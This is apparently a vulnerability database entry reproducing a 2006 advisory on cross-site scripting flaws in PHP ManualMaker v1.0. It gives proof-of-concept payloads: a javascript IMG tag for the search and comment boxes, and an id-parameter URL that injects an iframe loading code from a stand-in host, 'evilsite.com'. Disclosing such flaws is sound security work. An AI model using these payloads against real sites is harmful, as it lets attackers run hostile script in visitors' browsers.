<""><'<" XSS via URL injection of i...">PHP ManualMaker v1.0 - vulnerability database | Vulners.com<""><'<" XSS via URL injection of i..."><""><'<" XSS via URL injection of i..."><""><'<" XSS via URL injection of i...">
Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12956
HistoryJun 03, 2006 - 12:00 a.m.

PHP ManualMaker v1.0

2006-06-0300:00:00
vulners.com
4

PHP ManualMaker v1.0

Homepage:
http://deltascripts.com/phpmanualmaker/

Effected files:
index.php
Search boxes
Comment boxes

XSS proof of concept:

Input in search or comment box:
">">">'><IMG SRC=javascript:alert(&#0000039XSS&#0000039)><""><'<"

XSS via URL injection of id:
http://www.example.com/manualmaker/index.php?print=1&amp;id=&lt;iframe src=http://evilsite.com/evilcode.html <